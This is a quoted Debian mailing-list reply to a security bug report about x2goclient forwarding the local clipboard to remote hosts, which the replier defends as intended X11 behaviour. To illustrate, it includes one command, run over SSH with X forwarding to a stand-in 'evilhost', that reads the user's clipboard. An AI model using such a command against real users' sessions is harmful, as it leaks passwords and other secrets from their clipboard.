On 13-07-01 04:56, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
Package: x2goclient Severity: grave Tags: security
Hi.
From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
It seems that per default (and I even found no way to disable it) x2goclient (and perhaps other related tools?) transmit the content of the clipboard to the remote host.
Yes, other related tools like X11. x2go is basically just a faster version of the traditional xforwarding. In X11 every client can always access the clipboard/selection/etc., so you will also have the same security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this.
As this may easily contain passwords or other sensitive information, this is a extremely critical hole.
I disagree, this is not a hole at all, it works as intended. Its just that users are often not educated about the implications of passing around passwords via the clipboard etc.
But I concur that the ability to switch off clipboard/selection/... forwarding in the x2goagent/x2goclient would be nice to have. Patches are of course always welcome.
Ciao,
Alexander Wuerstlein.